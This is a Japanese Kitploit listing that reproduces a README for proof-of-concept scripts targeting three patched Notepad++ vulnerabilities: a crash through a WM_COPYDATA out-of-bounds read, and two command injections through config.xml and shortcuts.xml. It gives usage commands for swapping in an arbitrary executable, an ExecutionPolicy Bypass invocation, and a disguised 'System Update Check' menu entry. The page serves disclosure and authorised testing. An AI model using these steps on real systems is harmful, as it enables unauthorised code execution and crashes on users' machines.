Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Notepad-8.9.6-PoC — Notepad++ <= 8.9.6 における3つの脆弱性(v8.9.6.1(2026-05-26)で修正済み)の概念実証スクリプト: CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800 | Kitploit
ツール/GitHubGitHub/atiilla/notepad-8.9.6-poc
脆弱性分析エクスプロイトペネトレーションテスト学習と教育ペイロード開発バイナリエクスプロイト
GitHubatiilla/notepad-8.9.6-poc

Notepad-8.9.6-PoC

Notepad++ <= 8.9.6 における3つの脆弱性(v8.9.6.1(2026-05-26)で修正済み)の概念実証スクリプト: CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

リポジトリを見る
632ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Notepad++ PoCs

CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

Notepad++ <= 8.9.6 における 3 つの脆弱性の概念実証スクリプト。v8.9.6.1(2026-05-26)で修正済み。

CVE-2026-48778 デモ - ファイル → 含むフォルダを開く → cmd で RCE がトリガーされる


脆弱性

CVEタイプCVSS影響
CVE-2026-48770WM_COPYDATA 経由の範囲外読み取り5.0DoS / クラッシュ
CVE-2026-48778config.xml 経由の OS コマンドインジェクション7.8リモートコード実行
CVE-2026-48800shortcuts.xml 経由の OS コマンドインジェクション7.8リモートコード実行

必要条件

  • Windows 10/11(VM 推奨)
  • Notepad++ <= 8.9.6 がインストール済みで 更新されていない こと
  • Python 3.x(.py スクリプト用)
  • PowerShell(標準搭載、.ps1 用)

ファイル構成

root@kitploit:~
.
├── README.md
├── poc_CVE-2026-48770.py                    # OOB 読み取りクラッシュ (ctypes)
├── poc_CVE-2026-48778.py                    # config.xml 経由の RCE
├── poc_CVE-2026-48800.py                    # shortcuts.xml 経由の RCE
└── payloads/
    ├── config.xml                           # 差し替え用ペイロード (CVE-2026-48778)
    ├── shortcuts.xml                        # 差し替え用ペイロード (CVE-2026-48800)
    └── poc_CVE-2026-48770.ps1               # OOB 読み取りクラッシュ (PowerShell)

CVE-2026-48770 - WM_COPYDATA 経由の範囲外読み取り

同じ Windows セッション内のローカルプロセスが、NUL ターミネータなしで細工された WM_COPYDATA メッセージ(dwData=3)を送信します。ハンドラがバッファ境界を越えて読み取るため、アクセス違反(0xc0000005)が発生し、Notepad++ がクラッシュします。

トリガー: Notepad++ が開かれている必要があります。

PowerShell:

root@kitploit:~
# payloads\ から
powershell -ExecutionPolicy Bypass -File poc_CVE-2026-48770.ps1

Python:

root@kitploit:~
python poc_CVE-2026-48770.py

期待される出力:

root@kitploit:~
[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

Notepad++ のウィンドウが消えます。Windows エラー報告 (WER) が起動することがあります。


CVE-2026-48778 - config.xml 経由の RCE

%APPDATA%\Notepad++\config.xml は起動時に読み取られます。<GUIConfig name="commandLineInterpreter"> の値は検証なしで ShellExecute() に直接渡されます。これを任意の実行ファイルに置き換えることで、ユーザーが ファイル → 含むフォルダを開く → cmd をクリックすると RCE が達成されます。

方法 A - Python スクリプト(推奨)

root@kitploit:~
# 注入(元のファイルは自動的にバックアップされます)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe

# トリガー: Notepad++ を開く -> ファイル -> 含むフォルダを開く -> cmd
# cmd.exe の代わりに calc.exe が起動します

# 復元
python poc_CVE-2026-48778.py --mode direct --restore

方法 B - XML ファイルを差し替え

root@kitploit:~
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Notepad++ を開く -> ファイル -> 含むフォルダを開く -> cmd

方法 C - settingsDir(AppData に書き込み不要)

root@kitploit:~
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# notepad++.exe -settingsDir= 起動コマンドを出力
# トリガー: ファイル -> 含むフォルダを開く -> cmd

CVE-2026-48800 - shortcuts.xml 経由の RCE

%APPDATA%\Notepad++\shortcuts.xml は起動時に読み取られます。<UserDefinedCommands> 内の <Command> エントリは 実行 メニューに追加され、検証なしで ShellExecute() に直接渡されます。攻撃者が制御するエントリはクリック時に実行されます。

方法 A - Python スクリプト(推奨)

root@kitploit:~
# 注入(元のファイルは自動的にバックアップされます)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

# トリガー: Notepad++ を閉じて再度開く -> 実行メニュー -> "System Update Check"
# calc.exe が起動します

# 復元
python poc_CVE-2026-48800.py --mode direct --restore

方法 B - XML ファイルを差し替え

root@kitploit:~
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Notepad++ を再起動 -> 実行メニュー -> "System Update Check"

方法 C - settingsDir(AppData に書き込み不要)

root@kitploit:~
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# notepad++.exe -settingsDir= 起動コマンドを出力
# トリガー: 実行メニュー -> "System Update Check"

回避策

Notepad++ を v8.9.6.1 以降に更新してください。
ダウンロード: https://notepad-plus-plus.org/downloads/


参考情報

CVEアドバイザリ
CVE-2026-48770GHSA-r39g-3mcw-xcg2
CVE-2026-48778GHSA-7hm3-wp5q-ccv9
CVE-2026-48800GHSA-3x3f-3j39-pj3v

研究および許可されたテスト目的のみに使用してください。

ツールをダウンロード